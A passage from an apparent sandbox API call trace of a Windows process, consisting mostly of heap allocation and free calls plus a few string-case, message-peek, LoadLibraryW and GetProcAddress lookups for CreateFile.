hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab260 | out: hHeap=0x770000) returned 1 [0033.428] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0033.428] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce98 | out: hHeap=0x770000) returned 1 [0033.428] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccb8 | out: hHeap=0x770000) returned 1 [0033.428] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c5448 | out: hHeap=0x770000) returned 1 [0033.428] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0033.428] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c880 | out: hHeap=0x770000) returned 1 [0033.428] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899a0 | out: hHeap=0x770000) returned 1 [0033.428] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1648 | out: hHeap=0x770000) returned 1 [0033.428] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0033.428] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c20c0 | out: hHeap=0x770000) returned 1 [0033.428] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0033.428] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab2f0 | out: hHeap=0x770000) returned 1 [0033.428] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9a0 | out: hHeap=0x770000) returned 1 [0033.428] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0ce8 | out: hHeap=0x770000) returned 1 [0033.428] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0033.428] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14b8 | out: hHeap=0x770000) returned 1 [0033.428] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c5758 | out: hHeap=0x770000) returned 1 [0033.428] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0033.428] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c838 | out: hHeap=0x770000) returned 1 [0033.428] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ac0 | out: hHeap=0x770000) returned 1 [0033.428] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce08 | out: hHeap=0x770000) returned 1 [0033.428] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0033.428] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1378 | out: hHeap=0x770000) returned 1 [0033.428] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899d0 | out: hHeap=0x770000) returned 1 [0033.428] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1328 | out: hHeap=0x770000) returned 1 [0033.428] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0033.428] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13f0 | out: hHeap=0x770000) returned 1 [0033.428] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889c10 | out: hHeap=0x770000) returned 1 [0033.428] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ceb0 | out: hHeap=0x770000) returned 1 [0033.428] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b12b0 | out: hHeap=0x770000) returned 1 [0033.429] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0033.429] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13c8 | out: hHeap=0x770000) returned 1 [0033.429] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce20 | out: hHeap=0x770000) returned 1 [0033.429] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbb0 | out: hHeap=0x770000) returned 1 [0033.429] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbf8 | out: hHeap=0x770000) returned 1 [0033.429] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0033.429] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14e0 | out: hHeap=0x770000) returned 1 [0033.429] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cce8 | out: hHeap=0x770000) returned 1 [0033.429] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0033.429] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c928 | out: hHeap=0x770000) returned 1 [0033.429] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb38 | out: hHeap=0x770000) returned 1 [0033.429] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0c70 | out: hHeap=0x770000) returned 1 [0033.429] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0033.429] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1300 | out: hHeap=0x770000) returned 1 [0033.429] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898c8 | out: hHeap=0x770000) returned 1 [0033.429] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af438 | out: hHeap=0x770000) returned 1 [0033.429] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1508 | out: hHeap=0x770000) returned 1 [0033.429] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce68 | out: hHeap=0x770000) returned 1 [0033.429] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889928 | out: hHeap=0x770000) returned 1 [0033.429] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1440 | out: hHeap=0x770000) returned 1 [0033.429] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0033.429] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2080 | out: hHeap=0x770000) returned 1 [0033.429] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0033.429] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0033.429] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af438 [0033.429] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0033.429] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1440 [0033.429] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0033.429] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1440 | out: hHeap=0x770000) returned 1 [0033.429] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0033.429] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1440 [0033.429] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7af5a8 [0033.429] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1508 [0033.429] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889928 [0033.429] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3f8 [0033.429] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5b8 [0033.430] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0033.430] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce68 [0033.430] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0033.430] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x8898c8 [0033.430] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1300 [0033.430] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb38 [0033.430] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3f8 [0033.430] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c928 [0033.430] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cce8 [0033.430] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab2f0 [0033.430] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0033.430] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5b8 [0033.430] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0c70 [0033.430] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbf8 [0033.430] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5c8 [0033.430] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbb0 [0033.430] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0033.430] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce20 [0033.430] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5c8 [0033.430] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ceb0 [0033.430] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0033.430] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889c10 [0033.430] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5c8 [0033.430] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899d0 [0033.430] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0033.430] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce08 [0033.430] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5c8 [0033.430] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ac0 [0033.430] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0033.430] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c838 [0033.430] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5c8 [0033.430] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9a0 [0033.431] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0033.431] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899a0 [0033.431] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5c8 [0033.431] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c880 [0033.431] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0033.431] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccb8 [0033.431] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5c8 [0033.431] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b14e0 [0033.431] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce98 [0033.431] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af468 [0033.431] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0033.431] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8e0 [0033.431] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af468 [0033.431] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0033.431] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce98 | out: hHeap=0x770000) returned 1 [0033.431] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8e0 | out: hHeap=0x770000) returned 1 [0033.431] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14e0 | out: hHeap=0x770000) returned 1 [0033.431] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0033.431] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8e0 [0033.431] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5c8 [0033.431] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce98 [0033.431] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0033.431] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab260 [0033.431] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0c70 | out: hHeap=0x770000) returned 1 [0033.431] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc10 [0033.431] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5c8 [0033.431] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0033.431] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cee0 [0033.431] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5c8 [0033.431] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd48 [0033.431] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0033.431] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8895c8 [0033.431] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5c8 [0033.432] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0033.432] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8c8 [0033.432] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5c8 [0033.432] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cda8 [0033.432] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0033.432] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c898 [0033.432] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5c8 [0033.432] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0033.432] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7d8 [0033.432] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5c8 [0033.432] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7a8 [0033.432] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0033.432] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897f0 [0033.432] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5c8 [0033.432] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0033.432] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cef8 [0033.432] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5c8 [0033.432] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9b8 [0033.432] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0033.432] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x80) returned 0x7d5b30 [0033.432] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab260 | out: hHeap=0x770000) returned 1 [0033.432] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce80 [0033.432] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5c8 [0033.432] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0033.432] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5c8 [0033.432] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889220 [0033.432] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0033.432] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8f8 [0033.432] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af468 [0033.432] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0033.432] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c910 [0033.432] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8f8 | out: hHeap=0x770000) returned 1 [0033.432] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0033.432] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c910 | out: hHeap=0x770000) returned 1 [0033.433] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0033.433] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0c70 [0033.433] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0033.433] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c910 [0033.433] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af468 [0033.433] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0033.433] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8f8 [0033.433] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c910 | out: hHeap=0x770000) returned 1 [0033.433] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0033.433] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8f8 | out: hHeap=0x770000) returned 1 [0033.433] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0033.433] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0033.433] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8f8 [0033.433] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af468 [0033.433] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0033.433] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c910 [0033.433] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8f8 | out: hHeap=0x770000) returned 1 [0033.433] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0033.433] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c910 | out: hHeap=0x770000) returned 1 [0033.433] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0033.433] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0033.433] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c910 [0033.433] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af468 [0033.433] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0033.433] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8f8 [0033.433] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c910 | out: hHeap=0x770000) returned 1 [0033.433] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0033.433] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8f8 | out: hHeap=0x770000) returned 1 [0033.433] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0033.433] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0033.433] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8f8 [0033.433] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af468 [0033.433] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0033.433] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c910 [0033.434] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8f8 | out: hHeap=0x770000) returned 1 [0033.434] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0033.434] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c910 | out: hHeap=0x770000) returned 1 [0033.434] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0033.434] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0033.434] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c910 [0033.434] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af468 [0033.434] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af368 [0033.434] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8f8 [0033.434] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c910 | out: hHeap=0x770000) returned 1 [0033.434] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0033.434] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8f8 | out: hHeap=0x770000) returned 1 [0033.434] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0033.434] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af368 [0033.434] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8f8 [0033.434] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af468 [0033.434] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0033.434] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c910 [0033.434] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8f8 | out: hHeap=0x770000) returned 1 [0033.434] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0033.434] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c910 | out: hHeap=0x770000) returned 1 [0033.434] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0033.434] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0033.434] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c910 [0033.434] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af468 [0033.434] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0033.434] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8f8 [0033.434] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c910 | out: hHeap=0x770000) returned 1 [0033.434] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0033.434] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8f8 | out: hHeap=0x770000) returned 1 [0033.434] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0033.434] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0033.435] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8f8 [0033.435] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0033.435] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0033.435] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xb) returned 0x88c910 [0033.435] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x88c910, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFile", lpUsedDefaultChar=0x0) returned 11 [0033.435] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c910 | out: hHeap=0x770000) returned 1 [0033.435] GetProcAddress (hModule=0x76e10000, lpProcName="CreateFile") returned 0x0 [0033.435] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8f8 | out: hHeap=0x770000) returned 1 [0033.435] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0033.435] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0033.435] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b14e0 [0033.435] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8f8 [0033.435] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af468 [0033.435] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: 